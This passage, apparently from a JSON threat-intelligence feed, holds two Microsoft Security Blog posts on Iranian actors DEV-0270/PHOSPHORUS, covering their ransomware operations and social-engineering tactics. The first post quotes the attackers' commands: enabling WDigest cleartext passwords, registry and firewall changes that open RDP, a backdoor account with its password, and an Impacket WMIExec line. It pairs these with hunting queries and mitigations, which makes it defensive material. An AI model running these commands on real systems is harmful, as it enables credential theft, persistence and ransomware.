from the organization for sale packaged in an SQL database dump.\n\nUsing these observations, this blog details the group\u2019s tactics and techniques across its end-to-end attack chain to help defenders identify, investigate, and mitigate attacks. We also provide extensive hunting queries designed to surface stealthy attacks. This blog also includes protection and hardening guidance to help organizations increase resilience against these and similar attacks.\n\n![Infection chain describing the usual tactics and techniques used by DEV-0270 actor group.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/fig1-DEV-0270-attack-chain.png)Figure 1. Typical DEV-0270 attack chain\n\n## Who is DEV-0270?\n\nMicrosoft assesses that DEV-0270 is operated by a company that functions under two public aliases: Secnerd (secnerd[.]ir) and Lifeweb (lifeweb[.]ir). We have observed numerous infrastructure overlaps between DEV-0270 and Secnerd/Lifeweb. These organizations are also linked to Najee Technology Hooshmand (\u0646\u0627\u062c\u06cc \u062a\u06a9\u0646\u0648\u0644\u0648\u0698\u06cc \u0647\u0648\u0634\u0645\u0646\u062f), located in Karaj, Iran.\n\nThe group is typically opportunistic in its targeting: the actor scans the internet to find vulnerable servers and devices, making organizations with vulnerable and discoverable servers and devices susceptible to these attacks.\n\nAs with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\n## Observed actor activity\n\n### Initial access\n\nIn many of the observed DEV-0270 instances, the actor gained access by exploiting known vulnerabilities in Exchange or Fortinet (CVE-2018-13379). For Exchange, the most prevalent exploit has been ProxyLogon\u2014this highlights the need to patch high-severity vulnerabilities in internet-facing devices, as the group has continued to successfully exploit these vulnerabilities even recently, well after updates supplied the fixes. While there have been indications that DEV-0270 attempted to exploit [Log4j 2 vulnerabilities](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>), Microsoft has not observed this activity used against customers to deploy ransomware.\n\n### Discovery\n\nUpon gaining access to an organization, DEV-0270 performs a series of discovery commands to learn more about the environment. The command [_wmic_](<https://docs.microsoft.com/windows/win32/wmisdk/wmic>)_ computersystem get domain _obtains the target\u2019s domain name. The _whoami_ command displays user information and _net user_ command is used to add or modify user accounts. For more information on the accounts created and common password phrases DEV-0270 used, refer to the Advanced Hunting section.\n\n * wmic computersystem get domain\n * whoami\n * net user\n\nOn the compromised Exchange server, the actor used the following command to understand the target environment.\n \n \n Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders\n\nFor discovery of domain controllers, the actor used the following PowerShell and WMI command.\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/DEV-0270-powershell-1-63182c0939f00.png)\n\n### Credential access\n\nDEV-0270 often opts for a particular method using a LOLBin to conduct their credential theft, as this removes the need to drop common credential theft tools more likely to be detected and blocked by antivirus and endpoint detection and response (EDR) solutions. This process starts by enabling WDigest in the registry, which results in passwords stored in cleartext on the device and saves the actor time by not having to crack a password hash.\n \n \n \"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\n\nThe actor then uses _rundll32.exe_ and _comsvcs.dll_ with its built-in MiniDump function to dump passwords from LSASS into a dump file. The command to accomplish this often specifies the output to save the passwords from LSASS. The file name is also reversed to evade detections (_ssasl.dmp)_:\n\n![Screenshot of a PowerShell command.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/DEV-0270-powershell-2.png)\n\n### Persistence\n\nTo maintain access in a compromised network, the DEV-0270 actor adds or creates a new user account, frequently named _DefaultAccount _with a password of _P@ssw0rd1234,_ to the device using the command _net user /add._ The _DefaultAccoun_t account is typically a pre-existing account set up but not enabled on most Windows systems.\n\nThe attacker then modifies the registry to allow remote desktop (RDP) connections for the device, adds a rule in the firewall using _netsh.exe_ to allow RDP connections, and adds the user to the remote desktop users group:\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v TSEnabled /t REG_DWORD /d 1 /f\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD\n \n \n \"netsh\" advfirewall firewall add rule name=\"Terminal Server\" dir=in action=allow protocol=TCP localport=3389\n\nScheduled tasks are one of the recurrent methods used by DEV-0270 in their attacks to maintain access to a device. Generally, the tasks load via an XML file and are configured to run on boot with the least privilege to launch a .bat via the command prompt. The batch file results in a download of a renamed _dllhost.exe_, a reverse proxy, for maintaining control of the device even if the organization removes the file from the device.\n\n![Screenshot of scheduled tasks used by DEV-0270 actor group in their attacks.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/fig2-scheduled-task-in-DEV-0270-attacks-702x1024.png)Figure 2. Scheduled task used in DEV-0270 attacks\n\n### Privilege escalation\n\nDEV-0270 can usually obtain initial access with administrator or system-level privileges by injecting their web shell into a privileged process on a vulnerable web server. When the group uses Impacket\u2019s WMIExec to move to other systems on the network laterally, they are typically already using a privileged account to run remote commands. DEV-0270 also commonly dumps LSASS, as mentioned in the credential access section, to obtain local system credentials and masquerade as other local accounts which might have extended privileges.\n\nAnother form of privilege escalation used by DEV-0270 involves the creation or activation of a user account to provide it with administrator privileges. DEV-0270 uses _powershell.exe_ and _net.exe_ commands to create or enable this account and add it to the administrators\u2019 group for higher privileges.\n\n### Defense evasion\n\nDEV-0270 uses a handful of defensive evasion techniques to avoid detection. The threat actors typically turn off Microsoft Defender Antivirus real-time protection to prevent Microsoft Defender Antivirus from blocking the execution of their custom binaries. The threat group creates or activates the _DefaultAccount_ account to add it to the Administrators and Remote Desktop Users groups. The modification of the _DefaultAccount_ provides the threat actor group with a legitimate pre-existing account with nonstandard, higher privileges. DEV-0270 also uses _powershell.exe_ to load their custom root certificate to the local certificate database. This custom certificate is spoofed to appear as a legitimate Microsoft-signed certificate. However, Windows flags the spoofed certificate as invalid due to the unverified certificate signing chain. This certificate allows the group to encrypt their malicious communications to blend in with other legitimate traffic on the network.\n\nAdditionally, DEV-0270 heavily uses native LOLBins to effectively avoid detection. The threat group commonly uses native WMI, net, CMD, and PowerShell commands and registry configurations to maintain stealth and operational security. They also install and masquerade their custom binaries as legitimate processes to hide their presence. Some of the legitimate processes they masquerade their tools as include: _dllhost.exe_, _task_update.exe_, _user.exe_, and _CacheTask_. Using .bat files and _powershell.exe_, DEV-0270 might terminate existing legitimate processes, run their binary with the same process name, and then configure scheduled tasks to ensure the persistence of their custom binaries.\n\n### Lateral movement\n\nDEV-0270 has been seen creating _defaultaccount_ and adding that account to the Remote Desktop Users group. The group uses the RDP connection to move laterally, copy tools to the target device, and perform encryption.\n\nAlong with RDP, [Impacket](<https://github.com/SecureAuthCorp/impacket/>)\u2019s WMIExec is a known toolkit used by the group for lateral movement. In multiple compromises, this was the main method observed for them to pivot to additional devices in the organization, execute commands to find additional high-value targets, and dump credentials for escalating privileges.\n\nAn example of a command using Impacket\u2019s WMIExec from a remote device:\n \n \n cmd.exe /Q /c quser 1> \\\\127.0.0.1\\ADMIN$\\__1657130354.2207212 2>&1\n\n### Impact\n\nDEV-0270 has been seen using _setup.bat_ commands to enable BitLocker encryption, which leads to the hosts becoming inoperable. For workstations, the group uses _DiskCryptor_, an open-source full disk encryption system for Windows that allows for the encryption of a device's entire hard drive. The group drops _DiskCryptor_ from an RDP session and when it is launched, begins the encryption. This method does require a reboot to install and another reboot to lock out access to the workstation.\n\nThe following are DEV-0270\u2019s PowerShell commands using BitLocker:\n\n![Screenshot of PowerShell commands.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/DEV-0270-powershell-3-1024x566.png)\n\nMicrosoft will continue to monitor DEV-0270 and PHOSPHORUS activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended mitigation steps\n\nThe techniques used by DEV-0270 can be mitigated through the following actions:\n\n * Apply the [corresponding security updates for Exchange Server](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>), including applicable fixes for [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>). While it is important to prioritize patching of internet-facing Exchange servers to mitigate risk in an ordered manner, unpatched internal Exchange Server instances should also be addressed as soon as possible.\n * For Exchange Server instances in Mainstream Support, critical product updates are released for the most recently released Cumulative Updates (CU) and for the previous CU. For Exchange Server instances in Extended Support, critical product updates are released for the most recently released CU only.\n * If you don't have a supported CU, Microsoft is producing an additional series of security updates (SUs) that can be applied to some older and unsupported CUs to help customers more quickly protect their environment. For information on these updates, see March 2021 Exchange Server Security Updates for older Cumulative Updates of Exchange Server.\n * Installing the updates is the only complete mitigation for these vulnerabilities and has no impact on functionality. If the threat actor has exploited these vulnerabilities to install malware, installing the updates _does not_ remove implanted malware or evict the actor.\n * Use [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among devices whenever possible. This limits lateral movement and other attack activities.\n * Check your perimeter firewall and proxy to restrict or prevent network appliances like Fortinet SSL VPN devices from making arbitrary connections to the internet to browse or download files.\n * Enforce strong local administrator passwords. Use tools like [LAPS](<https://docs.microsoft.com/previous-versions/mt227395\$v=msdn.10\$?redirectedfrom=MSDN>).\n * Ensure that [Microsoft Defender Antivirus](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) is up to date and that real-time behavior monitoring is enabled.\n * Keep backups so you can recover data affected by destructive attacks. Use controlled folder access to prevent unauthorized applications from modifying protected files.\n * Turn on the following [attack surface reduction rules](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat:\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n * Block process creations originating from PsExec and WMI commands\n * Block persistence through WMI event subscription. Ensure that Microsoft Defender for Endpoint is up to date and that real-time behavior monitoring is enabled\n\n## Detection details\n\n### Microsoft Defender for Endpoint\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Malware associated with DEV-0270 activity group detected\n\nThe following additional alerts may also indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\nA script with suspicious content was observed| Suspicious file dropped by Exchange Server process \n---|--- \nA suspicious file was observed| Suspicious Modify Registry \nAnomalous behavior by a common executable| Suspicious Permission Groups Discovery \nLazagne post-exploitation tool| Suspicious PowerShell command line \nLocal Emails Collected| Suspicious PowerShell download or encoded command execution \nMimikatz credential theft tool| Suspicious Process Discovery \n'Mimilove' high-severity malware was prevented| Suspicious process executed PowerShell command \nNew group added suspiciously| Suspicious process launched using dllhost.exe \nOngoing hands-on-keyboard attack via Impacket toolkit| Suspicious 'PShellCobStager' behavior was blocked \nPossible Antimalware Scan Interface (AMSI) tampering| Suspicious Scheduled Task Process Launched \nPossible attempt to discover groups and permissions| Suspicious sequence of exploration activities \nPossible exploitation of Exchange Server vulnerabilities| Suspicious 'SuspExchgSession' behavior was blocked \nPossible exploitation of ProxyShell vulnerabilities| Suspicious System Network Configuration Discovery \nPossible web shell installation| Suspicious System Owner/User Discovery \nProcess memory dump| Suspicious Task Scheduler activity \nSuspicious Account Discovery: Email Account| Suspicious User Account Discovery \nSuspicious behavior by cmd.exe was observed| Suspicious user password change \nSuspicious behavior by svchost.exe was observed| Suspicious w3wp.exe activity in Exchange \nSystem file masquerade \nSuspicious behavior by Web server process| Tampering with the Microsoft Defender for Endpoint sensor \nSuspicious Create Account| Unusual sequence of failed logons \nSuspicious file dropped| WDigest configuration change \n \n## Hunting queries\n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for the related malicious activity in their environments.\n\n**DEV-0270 registry IOC**\n\nThis query identifies modification of registry by DEV-0270 actor to disable security feature as well as to add ransom notes:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270RegistryIOCSep2022.yaml>\n\n**DEV-0270 malicious PowerShell usage**\n\nDEV-0270 heavily uses PowerShell to achieve their objective at various stages of their attack. This query locates PowerShell activity tied to the actor:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270PowershellSep2022.yaml>\n\n**DEV-0270 WMIC discovery**\n\nThis query identifies _dllhost.exe_ using WMIC to discover additional hosts and associated domains in the environment:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270WMICDiscoverySep2022.yaml>\n\n**DEV-0270 new user creation**\n\nThis query tries to detect creation of a new user using a known DEV-0270 username/password schema:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270NewUserSep2022.yaml>\n\n### Microsoft 365 Defender\n\nTo locate possible actor activity, run the following queries.\n\n**Disable services via registry** \nSearch for processes modifying the registry to disable security features. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Disabling%20Services%20via%20Registry.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all(@\u2019\u201dreg\u201d\u2019, \u2018add\u2019, @\u2019\u201dHKLM\\SOFTWARE\\Policies\\\u2019, \u2018/v\u2019,\u2019/t\u2019, \u2018REG_DWORD\u2019, \u2018/d\u2019, \u2018/f\u2019)\n and InitiatingProcessCommandLine has_any(\u2018DisableRealtimeMonitoring\u2019, \u2018UseTPMKey\u2019, \u2018UseTPMKeyPIN\u2019, \u2018UseAdvancedStartup\u2019, \u2018EnableBDEWithNoTPM\u2019, \u2018RecoveryKeyMessageSource\u2019)\n\n**Modifying the registry to add a ransom message notification**\n\nIdentify registry modifications that are indicative of a ransom note tied to DEV-0270. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Modifying%20the%20registry%20to%20add%20a%20ransom%20message%20notification.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all(\u2018\u201dreg\u201d\u2019, \u2018add\u2019, @\u2019\u201dHKLM\\SOFTWARE\\Policies\\\u2019, \u2018/v\u2019,\u2019/t\u2019, \u2018REG_DWORD\u2019, \u2018/d\u2019, \u2018/f\u2019, \u2018RecoveryKeyMessage\u2019, \u2018Your drives are Encrypted!\u2019, \u2018@\u2019)\n\n**DLLHost.exe file creation via PowerShell**\n\nIdentify masqueraded _DLLHost.exe_ file created by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20file%20creation%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \u2018powershell.exe\u2019\n | where InitiatingProcessCommandLine has_all(\u2018$file=\u2019, \u2018dllhost.exe\u2019, \u2018Invoke-WebRequest\u2019, \u2018-OutFile\u2019)\n\n**Add malicious user to Admins and RDP users group via PowerShell**\n\nLook for adding a user to Administrators in remote desktop users via PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Add%20malicious%20user%20to%20Admins%20and%20RDP%20users%20group%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ 'powershell.exe'\n | where InitiatingProcessCommandLine has_all('$admins=', 'System.Security.Principal.SecurityIdentifier', 'Translate', '-split', 'localgroup', '/add', '$rdp=')\n\n**Email data exfiltration via PowerShell**\n\nIdentify email exfiltration conducted by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ 'powershell.exe'\n | where ProcessCommandLine has_all('Add-PSSnapin', 'Get-Recipient', '-ExpandProperty', 'EmailAddresses', 'SmtpAddress', '-hidetableheaders')\n\n**Create new user with known DEV-0270 username/password** \nSearch for the creation of a new user using a known DEV-0270 username/password schema. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Create%20new%20user%20with%20known%20DEV-0270%20username%20and%20password.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all('net user', '/add')\n | parse InitiatingProcessCommandLine with * \"user \" username \" \"*\n | extend password = extract(@\"\\buser\\s+[^\\s]+\\s+([^\\s]+)\", 1, InitiatingProcessCommandLine)\n | where username in('DefaultAccount') or password in('P@ssw0rd1234', '_AS_@1394')\n\n**PowerShell adding exclusion path for Microsoft Defender of ProgramData**\n\nIdentify PowerShell creating an exclusion path of ProgramData directory for Microsoft Defender to not monitor. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/PowerShell%20adding%20exclusion%20path%20for%20Microsoft%20Defender%20of%20ProgramData.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ \"powershell.exe\" and ProcessCommandLine has_all(\"try\", \"Add-MpPreference\", \"-ExclusionPath\", \"ProgramData\", \"catch\")\n \n\n**DLLHost.exe WMIC domain discovery**\n\nIdentify dllhost.exe using WMIC to discover additional hosts and associated domain. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20WMIC%20domain%20discovery.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"dllhost.exe\" and InitiatingProcessCommandLine == \"dllhost.exe\"\n | where ProcessCommandLine has \"wmic computersystem get domain\"\n \n\nThe post [Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations](<https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-07T21:00:00", "type": "mmpc", "title": "Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-44228"], "modified": "2022-09-07T21:00:00", "id": "MMPC:1E3441B57C08BC18202B9FE758C2CA71", "href": "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-19T19:23:28", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n![Timeline showing dates, threat actor, and malware payload of ransomware attacks by Iranian threat actors](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig1b-ransomware-timeline.png)\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n![Screenshot of code for adding a user ](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/code-1.png)\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n![Screenshot of ransom message](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/code-2.png)\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n![Bar chart showing activity per hour](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig2-DEV-0343-observed-operating-hours.png)\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n![Bar chart showing requests per day](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig3-DEV-0343-observed-actor-requests-per-day.png)\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, 